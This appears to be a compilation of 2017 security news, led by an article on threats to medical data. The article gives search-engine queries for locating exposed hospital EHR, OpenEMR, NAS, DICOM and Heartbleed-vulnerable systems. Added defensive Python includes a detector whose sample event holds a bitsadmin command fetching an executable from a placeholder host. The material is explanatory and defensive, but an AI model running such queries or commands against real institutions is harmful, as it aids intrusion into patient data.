Information that is collected by tracking vital signs can be used by both the owner of the device and the vendor of the infrastructure that the tracking app operates on. For users, the heart-rate parameter can signify that a certain activity should be decreased, specific medicines should be taken, etc., while vendors can send collected data to medical companies that can use it to assess the overall health of the client.

Thus, the main advantage of data collected by a gadget is not the depth of its analysis (any medical examination will yield more accurate results than readings from a fitness tracker) but the ability to evaluate changes in a patient’s health condition dynamically. Scenarios for using the information are limited by the imagination and enterprise of the owner, as well as by laws related to personal data.

If we look at the same piece of information from the perspective of a cybercriminal, then the outlook for the owner of such a device is far from favorable – analysis of certain parameters (for example, heart rate, sleep quality, or average ADL score) allows a criminal to gain an overview of a victim’s health. Additional information may be provided by a gadget that is connected to the mobile device and is capable, for instance, of measuring the blood pressure or blood sugar levels of its user. After drawing conclusions about the ailments of a victim, an evildoer can act to aggravate them.

Attacks to obtain health data can be divided into three basic types: those that violate data privacy, those that compromise data integrity, and those that attack data availability. Main vectors can be defined for each of those.

Types of attack that violate the privacy of medical data:

man-in-the-middle attacks on a sensor channel between the sensor and the service that stores the sensor’s data;
unauthorized access to local and remote data storage.
Types of attacks on data integrity:

unauthorized access to data storage with possible data substitution;
man-in-the-middle spoofing attacks on channels in order to substitute transmitted data;
modification (substitution) of data (spoofing attacks) and transmission of the modified data to consumers (such as the service that stores the data or an app).
Attacks on availability:

ransomware attacks (encryption/deletion of user data).
Entry points for malicious code that steals or substitutes data on a mobile device depend on the specific combination of device and software.

Online Medical Data

Yet, I would like to review another entry point in detail – information systems on a medical institution’s network that are accessible from the Internet.

Medical institutions utilize automated healthcare data storage solutions, which store miscellaneous information about patients (diagnosis results, information about prescribed drugs, medical histories, etc.). The infrastructure of such a system may include various hardware and software components, which can be merged into data storage networks and can be accessible from the Internet in one form or another.

Regarding solutions for storage of healthcare data, several software packages, which can be exploited as entry points into medical infrastructure, can be given as examples.

Hospital information systems (HISs) are software packages that control medical information coming from various sources, including the systems mentioned below.
Electronic Health Records (EHR) systems are dedicated software that enable storage of structured patient data and documentation of patient medical history.
Network-attached storage (NAS) refers to dedicated network storage devices, which can be either specialized devices for storing healthcare data or enterprise devices employed in the medical-institution
DICOM-compliant (Digital Imaging and Communications in Medicine) devices and PACS (picture archiving and communication system) servers are medical information systems based on the DICOM standard and include the following components:
a DICOM client, which is a medical device that is capable of transmitting data to a DICOM server;
a DICOM server, which is a hardware and software package that provides for the receipt and storage of data from clients (in particular, these devices can be PACS servers);
a DICOM diagnostic workstation and DICOM printers, both of which are hardware and software packages that are responsible for processing, visualizing, and printing medical images.
A key feature of the above-mentioned systems is a web interface (a web app) that is used to control them over the Internet. A web interface may have vulnerabilities that can be exploited by an evildoer, who can gain access to valuable information and processes. It is worth reviewing these systems in detail and verifying whether they are accessible from the Internet, i.e. if they are a potential entry point for evildoers.

Electronic Health Records (EHR)

In order to evaluate the number of apps that are available from the outside (from the Internet) and can work with EHR, a list of software employed in these tasks should be created and then a dork list should be organized. Dorks are special search-engine queries that are aimed at finding web components of required software among all of the resources indexed by a search engine.

Here is an example of a dork query that uses Google to search for the login form of EHR software components:

intitle:"<vendor_name> Login" & inurl:<vendor_name>

The example of a discovered web component (a login form) of software that is intended to work with EHR

It should be noted that some of the resources found in the search results turned out to be traps for evildoers (honeypots). This fact alone indicates that analysts are seeking to track threats related to medical infrastructure. To check whether an identified resource is a honeypot, its IP address can be submitted to a special service, HoneyScore, which, by scanning a number of the resource’s attributes (for example, the hosting provider), reaches a verdict on whether or not the resource is a honeypot. Nevertheless, a significant share of the discovered resources are real systems.

126 discovered resources that meet the search criteria

Each of the discovered web resources is a potential entry point that can be exploited by an evildoer to access the infrastructure. For example, many discovered systems lack protection against an exhaustive password search, which means that a criminal can use brute-force attacks. Then, by using a hacked account, the evildoer can gain privileged access to the system through the interface or find or exploit online vulnerabilities in order to access the system in the future.

An example of a discovered web interface for logging into an EHR system

Hospital Information Systems (HISs)

A “hospital information system” is quite a vast notion that includes a set of methods and technologies for processing medical information. In our case, we are interested only in the HIS components that have a web interface for controlling and visualizing medical information.

Let’s consider the software of OpenEMR as an example. This software is used in medical institutions as a medical-data management solution, and it is certified by the Office of the National Coordinator for Health Information Technology (ONC). Some of its components are written in the PHP programming language, which means that a potential entry point for an evildoer can be a web server that maintains these OpenEMR components.

The next Google dork query returned 106 search results that meet the following criterion:

inurl:"/interface/login/login_frame.php" intitle:"Login" intext:"Username:"

After a quick analysis of the search results, it became obvious that components of the majority of the discovered OpenEMR systems have vulnerabilities, including some critical ones, which open the OpenEMR database up to compromise. Moreover, exploits for the discovered vulnerabilities are publicly available.

An example of a vulnerable HIS that was openly exposed

For example, analyzing different software versions revealed that information had been published on the vulnerabilities for the vast majority of software installed on the hosts.

| OpenEMR version | Number of hosts (%) | Availability of public exploits |
|---|---|---|
| 4.2.0 | 31.4 | Yes |
| 4.1.2 | 14.3 | Yes |
| 4.1.0 | 11.4 | Yes |
| 4.2.1 | 5.7 | No |
| 4.0.0 | 5.7 | Yes |
| 4.1.1 | 2.8 | Yes |
| 4.3.1-dev | 2.8 | No |
| 2.8.3 | 2.8 | Yes |
| 3.2.0 | 2.8 | Yes |
| Proprietary (modified) version | 8.5 | – |
| Unknown version | 11.4 | – |

Network Attached Storage (NAS)

There are at least two types of NAS servers that have been used by medical institutions: dedicated “medical” NAS servers and common ones. While the former have strict security requirements for the data stored on them (for example, compliance with the Health Insurance Portability and Accountability Act), the security of the latter rests on the conscience of their developers and the medical institutions that use this type of NAS in their infrastructure. As a result, non-medical NAS may be left working without any updates for years and thus gather a great number of known vulnerabilities.

A list of dorks should be created to select NAS devices located in medical institutions out of all of the other devices indexed by search engines.

The next query is for the Censys search engine, which specializes in indexing devices with IP addresses and finds all of the devices (workstations, servers, routers, NAS servers, etc.) that belong to companies whose names contain words that directly or indirectly define these companies as medical institutions (“healthcare”, “clinic”, “hospital”, and “medical”):

autonomous_system.organization: (hospital or clinic or medical or healthcare)

The Censys search engine found approximately 21,278 hosts that are related to medical institutions

The Censys report, which is shown below, lists the top 10 countries where these hosts are located.

| Country | Hosts |
|---|---|
| United States | 18,926 |
| Canada | 1,113 |
| Iran | 441 |
| Saudi Arabia | 379 |
| Republic of Korea | 135 |
| Australia | 81 |
| Thailand | 33 |
| United Kingdom | 32 |
| Puerto Rico | 28 |
| Vietnam | 27 |

Next, the hosts that are FTP servers can be picked out of these results. To do this, the search query must be made more specific: for example, only hosts that have an open FTP port and whose banners contain the string “FTP” should be searched for (the banner is the information a server sends to a client that attempts to connect to its port):

(tags: ftp) and autonomous_system.organization: (health or clinic or medical or healthcare)

The search results displayed 1,094 hosts with operational FTP servers, which presumably belong to medical institutions.

Additionally, a list of vendor-specific NAS devices can be obtained from the narrowed-down search results. For this, the typical characteristics of a device must be known. These may be included in responses from services that are active on the device (for example, an FTP-server response to a connection attempt may contain the name of the device and its firmware version). The next query allows for selection of only those hosts that contain the “NAS” line in their banner (generally, several QNAP Systems models have this property) from all found hosts:

(metadata.description: nas) and autonomous_system.organization: (health or clinic or medical or healthcare)

The discovered QNAP Systems NAS servers that belong to medical organizations

Each of the NAS devices found was running a ProFTPD release with known vulnerabilities, and information about exploits for that release is publicly and easily available.

PACS Servers and DICOM Devices

The most common type of devices that utilize the DICOM format are PACS servers that print patient images that have been received from other DICOM devices.

It is possible to enter the following primitive query in the Shodan search engine to start searching for DICOM devices:

DICOM port:104

Accordingly, the search results will display hosts (mostly workstations and servers) that are used in medical institutions for storing and processing patient DICOM images.

The list of hosts that are used to process/store DICOM images

Also, it might be worth searching for diagnostic DICOM workstations, which are dedicated PACS systems used for processing, diagnosing, and visualizing data. As an example, the following query for the Censys search engine can be used:

pacs and autonomous_system.organization: (hospital or clinic or medical or healthcare)

Analysis of the search results may reveal dedicated software for a diagnostic workstation.

The login forms of diagnostic workstations used for visualization of patient data

Aside from that, there are also admin panels used to access DICOM servers in the search results.

A login form for accessing a DICOM server

Non-medical Systems with “Pathologies”

The systems described above handle valuable medical data. Therefore, security requirements for those systems must be high. However, let’s not forget that besides potential entry points, there are dozens of other points an evildoer can use that are not directly related to medical systems but are located in the infrastructure along with valuable data.

Here are several examples of non-medical systems that can be used as a potential entry point into a computer network with the goal of subsequently moving on to resources where medical information is stored:

any servers (web servers, FTP servers, e-mail servers, etc.) that are connected to the network of an institution and are accessible from the Internet;
a medical institution’s public Wi-Fi hotspots;
office printers;
video surveillance systems;
SCADA controllers;
automated systems for controlling mechanical and electrical components of a building (building management systems, BMS).
Each of the mentioned systems may have a vulnerability that can be taken advantage of by an evildoer in order to gain access to medical infrastructure.

For example, the prevalence of the Heartbleed vulnerability can be evaluated by entering the following query into the Censys search engine:

autonomous_system.organization: (hospital or clinic or medical or healthcare) and 443.https.heartbleed.heartbleed_vulnerable: 1

The search engine showed 66 hosts that met the criteria and were potentially vulnerable to Heartbleed, and this was long after the existence of the vulnerability and its dangers had been given wide coverage by the mass media. Generally speaking, the Heartbleed problem is global in nature: according to a report by the founder of Shodan, approximately 200,000 websites still remain vulnerable.

Stay Healthy

In order to keep evildoers from stealing medical data from institutions, we recommend, alongside the essential security measures typical for enterprise infrastructure, doing the following:

exclude from external access all of the information systems that process medical data or any other patient-related data;
all of the medical equipment that connects to a workstation (or is a network node) should be isolated in a dedicated segment, while the operational parameters of the equipment can be modified by using the workstation (or remotely);
any online information systems should be isolated in a “demilitarized” zone or completely excluded from an enterprise network;
continuously monitor medical-system software for updates and update software regularly;
change default passwords that are set up for the login forms of medical systems and delete unwanted accounts from the database (for example, test accounts);
create strong passwords for all accounts.
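The search queries in this article find exposures from the outside; the same checks can be run from the inside against an institution's own inventory of Internet-facing hosts before a search engine indexes them. The Python below is an added example, not code from the article or from Kaspersky: it triages a constructed Censys/Shodan-style export for the entry points discussed above (OpenEMR login pages on releases the table marks as having public exploits, NAS devices answering FTP, DICOM on port 104, Heartbleed-vulnerable TLS endpoints). The inventory records, banners and severity ranking are assumptions made for the demonstration.

```python
"""Defender-side triage of a medical institution's own Internet-facing asset
inventory, flagging the entry points the article enumerates: OpenEMR login
pages on releases with public exploits, NAS devices answering FTP, DICOM
reachable on port 104, and TLS endpoints still vulnerable to Heartbleed."""
import re

# Releases the article's table marks as having public exploits.
OPENEMR_PUBLIC_EXPLOITS = {"4.2.0", "4.1.2", "4.1.0", "4.0.0", "4.1.1", "2.8.3", "3.2.0"}
OPENEMR_LOGIN_PATH = "/interface/login/login_frame.php"
DICOM_PORT = 104
RANK = {"critical": 3, "high": 2, "medium": 1}

# Constructed inventory in the shape of a Censys/Shodan-style export
# (documentation addresses, made-up banners); these are not real hosts.
SAMPLE_INVENTORY = [
    {"ip": "192.0.2.10", "ports": {80: "Apache/2.2.22"},
     "http_path": OPENEMR_LOGIN_PATH, "app_version": "4.2.0"},
    {"ip": "192.0.2.11", "ports": {21: "220 QNAP NAS FTP server ProFTPD 1.3.4e ready"}},
    {"ip": "192.0.2.12", "ports": {DICOM_PORT: "DICOM"}},
    {"ip": "192.0.2.13", "ports": {443: "nginx/1.10"}, "heartbleed_vulnerable": True},
    {"ip": "192.0.2.14", "ports": {443: "nginx/1.10"}, "heartbleed_vulnerable": False},
    {"ip": "192.0.2.15", "ports": {443: "Apache/2.4"},
     "http_path": OPENEMR_LOGIN_PATH, "app_version": "4.3.1-dev"},
]


def check_openemr(host):
    """An exposed OpenEMR login is a finding on its own; the release decides severity."""
    if host.get("http_path") != OPENEMR_LOGIN_PATH:
        return []
    ver = host.get("app_version", "")
    out = [("high", "OpenEMR login form reachable from the Internet")]
    if ver in OPENEMR_PUBLIC_EXPLOITS:
        out.append(("critical", f"OpenEMR {ver}: public exploits available"))
    elif not re.match(r"\d+\.\d+\.\d+", ver):
        out.append(("medium", "OpenEMR version unknown or modified; verify manually"))
    return out


def check_ftp(port, banner):
    """FTP banners leak device type and firmware; a NAS on FTP exposes the data store."""
    if port != 21 and "FTP" not in banner.upper():
        return []
    out = [("medium", f"FTP service exposed on port {port}")]
    if re.search(r"\bNAS\b", banner, re.I):
        out.append(("high", "NAS device answering FTP from the Internet"))
    m = re.search(r"ProFTPD[ /](\d+\.\d+\.\d+\w*)", banner)
    if m:
        out.append(("high", f"ProFTPD {m.group(1)} banner visible; check for known CVEs"))
    return out


def audit_host(host):
    """Return findings for one host, most severe first."""
    findings = []
    ports = host.get("ports", {})
    if DICOM_PORT in ports:
        findings.append(("critical", "DICOM service (port 104) reachable from the Internet"))
    for port, banner in ports.items():
        findings.extend(check_ftp(port, banner))
    if host.get("heartbleed_vulnerable"):
        findings.append(("critical", "TLS endpoint still vulnerable to Heartbleed (CVE-2014-0160)"))
    findings.extend(check_openemr(host))
    findings.sort(key=lambda f: -RANK[f[0]])   # stable sort keeps insertion order within a rank
    return findings


def audit_inventory(hosts):
    """{ip: findings} for every host that has something to report."""
    report = {}
    for host in hosts:
        findings = audit_host(host)
        if findings:
            report[host["ip"]] = findings
    return report


if __name__ == "__main__":
    for ip, findings in audit_inventory(SAMPLE_INVENTORY).items():
        for severity, message in findings:
            print(f"{ip:12} {severity:8} {message}")
```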


Scottrade Bank admits a data breach that potentially exposed 20,000 customers’ records
6.4.2017 securityaffairs CyberCrime

Scottrade Bank confirmed that a technical incident has exposed 20,000 customer records. A 60GB MSSQL database was accidentally left open online.
It is official: Scottrade Bank suffered a data breach that affected thousands of its customers.

Online brokerage Scottrade has admitted a data breach involving sensitive loan applications from roughly 20,000 customers.

Scottrade

The incident occurred when IT services company Genpact uploaded the sensitive data to an Amazon-hosted server. Unfortunately, the company did not protect the archive, leaving it exposed online.

The incident was discovered by the popular security expert Chris Vickery, who is well known for having discovered many other databases left online without protection. Vickery found the archive and downloaded the 158.9GB Microsoft SQL database, then decided to report the issue to Scottrade.

According to Vickery the archive contains account passwords in plain text, the exposed records include names, addresses and social security numbers.

Chris Vickery (@VickerySec), 2 Apr 2017:
Large MSSQL db fully loaded. It's as bad as I expected. Bank-related. Plaintext passwords. Big name company. I've reached out to them.

Scottrade promptly started an investigation and discovered the root cause of the incident: a Genpact employee had not properly configured the SQL server.

“On April 2, Genpact, a third party vendor, confirmed that it had uploaded a data set to one of its cloud servers that did not have all security protocols in place. As a result, the data was not fully secured for a period of time. The file contained commercial loan application information of a small B2B unit within Scottrade Bank, including non-public information of as many as 20,000 individuals and businesses.” reads the official statement issued by Scottrade. “Upon being alerted to the issue, Genpact immediately secured that information, and traced the issue to a configuration error on their part while uploading the file.”

The archive was taken offline immediately after the breach notification.

The service provider Genpact is investigating the incident to determine which data were exposed.

“Genpact is undertaking an extensive analysis of the log files and the environment to determine to what extent the data may have been accessed. It has engaged a leading forensics firm to assist in the analysis.” continues the statement.

Genpact and Scottrade confirmed that the incident was not caused by a cyber attack against the internal servers of either company.

Scottrade had already suffered a data breach in the past: in October 2015, an incident exposed the personal information of 4.6 million customers.


Apache Struts Flaw Used to Deliver Cerber Ransomware

6.4.2017 securityweek Virus
A recently patched Apache Struts 2 vulnerability has been exploited by cybercriminals to deliver Cerber ransomware to Windows systems, researchers warned.

The flaw, tracked as CVE-2017-5638, can be exploited for remote code execution. Malicious actors started exploiting the vulnerability to deliver malware shortly after a patch was made available and a proof-of-concept (PoC) exploit was released.

In many cases, attackers targeted Unix systems with backdoors and distributed denial-of-service (DDoS) bots, but recently experts also spotted a campaign targeting Windows machines.

In the week of March 20, researchers at F5 Networks started seeing attacks delivering Cerber ransomware to Windows servers. Experts at the SANS Technology Institute also reported seeing these attacks on Wednesday.

Cybercriminals have used the exploit to execute shell commands and run BITSAdmin and other command-line tools shipped with Windows. These tools are used to download and execute the Cerber malware.
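A defender-side illustration of the chain described above, added here and not part of the original article or of the F5 and SANS research it cites: a small detection routine that scans process-creation telemetry for a web or application server process spawning a shell or a Windows download tool such as BITSAdmin. The process names in the watchlists (java.exe as the servlet-container process that would host a Struts 2 application, certutil.exe and powershell.exe beside bitsadmin.exe) and the sample events are my assumptions, constructed for the example; real rules would be tuned to the deployment being monitored.

```python
import re
from typing import Dict, List, Optional

# Assumed image names of the process a Struts 2 web application runs in on
# Windows (a Java servlet container). Adjust to the monitored deployment.
WEB_SERVER_IMAGES = {"java.exe", "javaw.exe", "tomcat8.exe", "tomcat9.exe"}

# Windows shells and built-in download tools. bitsadmin is the tool named in
# the article; certutil and powershell are common additions to such a watchlist.
SHELLS = {"cmd.exe", "powershell.exe"}
DOWNLOAD_TOOLS = {"bitsadmin.exe", "certutil.exe", "powershell.exe"}

URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: Dict[str, str]) -> Optional[Dict[str, object]]:
    """Return an alert for a suspicious process-creation event, or None."""
    parent = _basename(event["parent_image"])
    image = _basename(event["image"])
    cmd = event.get("command_line", "")
    cmd_lower = cmd.lower()
    reasons: List[str] = []
    severity = "medium"

    # Rule 1: a servlet container should never spawn a shell or a download tool.
    # After a Struts RCE the container is the parent of whatever the attacker ran.
    if parent in WEB_SERVER_IMAGES and image in SHELLS | DOWNLOAD_TOOLS:
        reasons.append(f"web/app server process {parent} spawned {image}")
        severity = "high"

    # Rule 2: a BITS transfer job pulling from a URL, whoever launched it.
    # Administrators do this legitimately, so on its own it is medium severity.
    if "bitsadmin" in cmd_lower and "/transfer" in cmd_lower and URL_RE.search(cmd):
        reasons.append("BITSAdmin download job with remote URL")

    if not reasons:
        return None
    return {"host": event["host"], "image": image, "parent": parent,
            "severity": severity, "reasons": reasons}


def detect(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Run classify() over a batch of events, keeping only the alerts."""
    return [alert for alert in (classify(e) for e in events) if alert]


# Constructed sample telemetry (not real data); field names are modelled on a
# typical process-create record. Hostnames in URLs use the reserved .invalid TLD.
SAMPLE_EVENTS = [
    # Shape of the Struts-to-Cerber chain: the servlet container's JVM spawns
    # cmd.exe, which starts a BITS job to fetch and stage an executable.
    {"host": "web01", "parent_image": r"C:\Tomcat\bin\java.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "command_line": r"cmd.exe /c bitsadmin /transfer upd /download /priority high "
                     r"http://payload.invalid/update.exe C:\Windows\Temp\update.exe"},
    # An administrator fetching an installer with bitsadmin from an interactive shell.
    {"host": "ws12", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "command_line": r"cmd.exe /c bitsadmin /transfer vendor /download "
                     r"http://downloads.vendor.invalid/setup.msi C:\Temp\setup.msi"},
    # Normal service start of the JVM itself.
    {"host": "web01", "parent_image": r"C:\Windows\System32\services.exe",
     "image": r"C:\Tomcat\bin\java.exe",
     "command_line": r"java.exe -Dcatalina.home=C:\Tomcat org.apache.catalina.startup.Bootstrap"},
    # Unrelated user activity.
    {"host": "ws12", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe", "command_line": "notepad.exe"},
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert["severity"].upper(), alert["host"], "; ".join(alert["reasons"]))
```

The parent-child rule is the one that separates the campaign from ordinary administration: a BITS download on its own is common, but a servlet container that spawns cmd.exe or bitsadmin.exe has almost no benign explanation, which is why only the first sample event is rated high.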

The ransomware encrypts important files found on the system and demands money in return for the “special decryption software” needed to recover the files.

The Bitcoin address where victims are instructed to send the ransom is the same across multiple campaigns. F5 Networks reported seeing 84 bitcoins, currently worth nearly $100,000, in that address.

“The new vulnerability in Apache STRUTS provides a target-rich environment for threat actors to extend their business while infecting thousands of new servers,” F5 said in a blog post. “Targeting servers, rather than individuals, with ransomware has better chances for monetization because those are usually run by organizations with deeper pockets and better infrastructure that might be critical for their business.”

AT&T vulnerable to Apache Struts exploit

The Apache Struts vulnerability has been found to affect many products, including from Cisco and VMware.

Independent security researcher Corben Douglas reported on Wednesday that he tested AT&T systems roughly 4-5 days after the exploit was released and they had been vulnerable to attacks. The expert said he managed to execute commands on AT&T servers, which could have allowed him to “pwn” the company.


Mozilla Wants 64 Bits of Entropy in Certificate Serial Numbers

6.4.2017 securityweek Security
Mozilla this week announced an update to its CA Certificate Policy, which now requires the use of 64 bits of entropy in certificate serial numbers.

The change was included in Mozilla’s CA Certificate Policy 2.4.1, and arrives nearly one year after the CA/Browser Forum adopted Ballot 164, which required Certificate Authorities to use greater randomization when issuing certificates, to mitigate collision attacks and make preimage attacks more difficult.

The ballot also proposed replacing the term “entropy” with output from a cryptographically secure pseudo-random number generator (CSPRNG). Thus, Section 7.1 of the Baseline Requirements was modified to read: “Effective September 30, 2016, CAs SHALL generate Certificate serial numbers greater than zero (0) containing at least 64 bits of output from a CSPRNG.”

The change was proposed after it was demonstrated that hash collisions can allow attackers to forge a signature on a certificate of their choosing, and that unpredictable bits in the serial number effectively double the security level a hash function provides against such attacks. While adding random bits had been encouraged before, the ballot made it a requirement.
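To make the quoted rule concrete, here is an added example (mine, not code from Mozilla or the CA/Browser Forum) of a serial-number generator that satisfies it, together with the static checks an auditor can run on an issued serial. The 20-octet ceiling comes from RFC 5280, which the article does not mention; the function names and the 16-byte default are my choices.

```python
import secrets

MIN_RANDOM_BITS = 64    # Baseline Requirements 7.1 after Ballot 164: at least 64 bits of CSPRNG output
MAX_SERIAL_OCTETS = 20  # RFC 5280 4.1.2.2: serialNumber MUST NOT exceed 20 octets in DER


def der_integer_octets(value: int) -> int:
    """Number of content octets DER uses for a non-negative INTEGER.

    A leading 0x00 is required when the top bit of the first byte is set, so
    0x80 costs two octets while 0x7F costs one.
    """
    if value < 0:
        raise ValueError("negative serial numbers are not permitted")
    return (value.bit_length() + 8) // 8


def generate_serial(random_bytes: int = 16) -> int:
    """Generate a serial number carrying `random_bytes` of CSPRNG output.

    The most significant bit is cleared so the DER encoding stays positive
    without a padding byte and fits in `random_bytes` octets. That costs one
    bit, so the default 16 bytes give 127 unpredictable bits, well above the
    64-bit floor the Baseline Requirements impose.
    """
    if random_bytes * 8 - 1 < MIN_RANDOM_BITS:
        raise ValueError(f"{random_bytes} bytes cannot carry {MIN_RANDOM_BITS} random bits")
    if random_bytes > MAX_SERIAL_OCTETS:
        raise ValueError("serial would exceed the 20-octet limit")
    while True:
        raw = bytearray(secrets.token_bytes(random_bytes))
        raw[0] &= 0x7F
        serial = int.from_bytes(raw, "big")
        if serial > 0:  # "greater than zero"; an all-zero draw is astronomically unlikely
            return serial


def check_serial(serial: int) -> list:
    """Static checks an auditor can run on an issued serial number.

    Randomness cannot be proven from a single value. What can be checked is
    that the number is positive, is long enough to have room for 64 random
    bits, and still encodes within 20 octets.
    """
    findings = []
    if serial <= 0:
        findings.append("serial is not greater than zero")
    elif serial.bit_length() < MIN_RANDOM_BITS:
        findings.append(f"only {serial.bit_length()} bits: cannot contain 64 bits of CSPRNG output")
    if serial >= 0 and der_integer_octets(serial) > MAX_SERIAL_OCTETS:
        findings.append(f"DER encoding needs {der_integer_octets(serial)} octets, limit is 20")
    return findings


if __name__ == "__main__":
    s = generate_serial()
    print(f"serial=0x{s:x} bits={s.bit_length()} der_octets={der_integer_octets(s)} "
          f"findings={check_serial(s)}")
    print("sequential serial 12345:", check_serial(12345))
```

The reason the random bits help is that a collision attack on the signature hash requires the attacker to predict the exact to-be-signed bytes of the certificate in advance; a serial drawn from a CSPRNG immediately before signing defeats that prediction, which is the sense in which the article says the hash function's effective security level is doubled.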

The updated CA Certificate Policy also states that CP and CPS documents now need to be submitted to Mozilla each year, in addition to audit statements, and that these documents need to be provided in English starting June 1, 2017. The company also updated the applicable versions of some audit criteria.

Mozilla also notes that submitted documentation must be openly licensed and that the Common CCADB Policy and the Mozilla CCADB Policy are incorporated by reference in Mozilla’s CA Certificate Policy version. Further, the new Common CA Database (CCADB) Policy makes official a number of existing expectations regarding the CCADB, and there are additional requirements on OCSP responses, the company says.

The organization has already sent the CA Communication to the Primary Point of Contact (POC) for each CA and asked them to respond to 14 action items. Additionally, CAs are invited to contribute to discussions in the mozilla.dev.security.policy forum about upcoming changes, questions and clarifications about policy and expectations, and root certificate inclusion/change requests.

“With this CA Communication, we re-iterate that participation in Mozilla’s CA Certificate Program is at our sole discretion, and we will take whatever steps are necessary to keep our users safe. Nevertheless, we believe that the best approach to safeguard that security is to work with CAs as partners, to foster open and frank communication, and to be diligent in looking for ways to improve,” the company said.


"Philadelphia" Ransomware Targets Healthcare Industry

6.4.2017 securityweek Virus
A newly observed ransomware family is being used in attacks against organizations in the healthcare industry, Forcepoint security researchers reveal.

Dubbed Philadelphia, the malware is a variant of the Stampado malware that emerged last year as one of the cheapest ransomware families available for would-be cybercriminals. It was being offered at only $39 for a lifetime license, much less than what other threats sold via the ransomware-as-a-service (RaaS) business model cost. An ad for Philadelphia was spotted last month on YouTube.

The Philadelphia ransomware, Forcepoint says, appears to be distributed via spear-phishing emails that contain a shortened URL, and has already been used to infect a hospital serving Oregon and Southwest Washington. The link redirects to a personal storage site that serves a malicious DOCX file containing the targeted healthcare organization's logo to give it an increased sense of legitimacy.

The file includes three document icons allegedly pertaining to patient information, and the intended victim is encouraged to click on any of them. However, once that happens, a malicious JavaScript is triggered to download and execute the Philadelphia ransomware.

After installation, the malware communicates to its command and control (C&C) server to check in. It sends various details on the infected system, including operating system, username, country, and system language, and the C&C responds with a generated victim ID, a Bitcoin wallet ID, and the Bitcoin ransom price.

Next, the malware starts encrypting user files using AES-256 encryption. Once the process has been completed, the ransomware displays a window informing users that their files have been encrypted and urging them to pay 0.3 Bitcoins to a specific address.

According to Forcepoint, not only did the cybercriminals use a tailored bait targeting a specific healthcare organization in their attack, but the encrypted JavaScript they used contained the string “hospitalspam” in its directory path. Moreover, the C&C server also contained “hospital/spam” in its path.

This would suggest that the actor is specifically targeting hospitals using spear phishing emails for distribution, the researchers say. The campaign supposedly started in the third week of March.

“Individually, this may not be a great deal of an attack towards the Healthcare sector. However, this may signify the start of a trend wherein smaller ransomware operators empowered by RaaS platforms will start aiming for this industry, ultimately leading to even bigger and diversified ransomware attacks against the Healthcare sector,” Forcepoint concludes.


PLCs From Several Vendors Vulnerable to Replay Attacks

6.4.2017 securityweek ICS
Programmable logic controllers (PLCs) from several major vendors are affected by implementation flaws that can be exploited by attackers to execute arbitrary commands on the vulnerable devices, researchers warned.

The vulnerabilities, identified by ICS security firm CRITIFENCE, are related to the Modbus communications protocol, which is often used for connecting industrial devices. The company has been criticized for leading people to believe that ransomware attacks leveraging the flaws had already been spotted in the wild.

According to CRITIFENCE, devices from several companies are vulnerable to attacks, including Schneider Electric, GE and Rockwell Automation’s Allen-Bradley.

For the time being, only Schneider has addressed the problem, and the advisory published by the security firm focuses on Schneider products. ICS-CERT and the other affected vendors have been notified.

In the case of Schneider, the vulnerabilities affect Modicon PLCs. The company has not released any firmware updates, but pointed out that some of its products already include protection mechanisms for these types of attacks, and provided mitigation advice for devices that don’t have any built-in protections.

CRITIFENCE said in its advisory that attacks are possible against Schneider PLCs due to two vulnerabilities: CVE-2017-6034 and CVE-2017-6032. An attacker who has access to the OT network can intercept traffic going to the targeted PLC, including the session identifier needed to send administrative commands to the device.

Once they obtain the session key, which is transmitted in clear text, attackers can replay the request and add arbitrary commands, including for starting and stopping the PLC, and downloading its ladder diagram.

CRITIFENCE has published a proof-of-concept (PoC) exploit showing how a remote attacker can execute arbitrary commands on a Schneider PLC. The company believes these types of flaws can be exploited in ransomware-style attacks where hackers threaten to wipe ladder diagrams from PLCs unless their demands are met.

This attack scenario, dubbed “ClearEnergy” by CRITIFENCE, has drawn criticism from some ICS security experts. CRITIFENCE initially led readers to believe that ClearEnergy attacks had actually been spotted in the wild, with a news article titled “ClearEnergy ransomware aim to destroy process automation logics in critical infrastructure, SCADA and industrial control systems.” The company later clarified that it was only a PoC ransomware attack.


Microsoft Details Data Collection in Windows 10 Creators Update

6.4.2017 securityweek Privacy
Microsoft on Wednesday revealed details on the data that the next major Windows 10 version, set to arrive next week, will collect from computers.

Ever since first announcing Windows 10, the tech giant faced criticism for collecting a large amount of data on the usage of the platform and applications. In July 2016, France served notice to Microsoft to stop collecting excessive user data without consent on civil liberty grounds.

In September 2015, the company said that the collected data was meant to improve the overall user experience. Only months before, the company had boosted data collection in Windows 7 and Windows 8.

In January this year, the company took the wraps off a privacy dashboard, meant to provide users with increased visibility and control over the data collected by Microsoft services, and even allows them to clear the collected data if they want to.

At the time, Microsoft also revealed that Windows 10 Creators Update will simplify Diagnostic data levels, reduce data collected at the Basic level, and present only two data collection options to users: Basic and Full. The platform update will also bring increased privacy settings, Microsoft said in early March.

Only one week before Windows 10 Creators Update starts rolling out to users, Microsoft decided to provide specific information on the type of data it will be gathering from users’ computers based on the collection level selected.

“The Basic level gathers a limited set of information that is critical for understanding the device and its configuration including: basic device information, quality-related information, app compatibility, and Windows Store,” Microsoft’s Brian Lich explains.

Security level information is also collected as part of the Basic level, with all of the gathered information meant to help identify problems that can occur on a particular hardware or software configuration.

When it comes to the Full level, the type of collected data expands dramatically beyond the data gathered in the Basic level, to include device, connectivity, and configuration data; products and services usage data; software setup and inventory data; browsing, search and query data; typing and speech data; and licensing and purchase data.

Thus, users who opt in for this data collection level will allow their Windows 10 machine to send information such as OS version, user ID, Xbox user ID, device ID, device properties and capabilities, app usage, device health and crash data, device performance and reliability data, device preferences and network info, installed applications, content consumption data, and information on purchases made on the device.

Facing increased scrutiny over its data collection practices, Microsoft appears determined to become more transparent on the matter, so as to ensure it doesn’t run into too much trouble, especially in the European Union, which last year started investigating the tech giant on user privacy-related issues. For that, the company also published a privacy statement.


Operation Cloud Hopper: China-based Hackers Target Managed Service Providers

6.4.2017 securityweek CyberCrime
Operation Cloud Hopper Targets Managed IT Service Providers and Their Clients

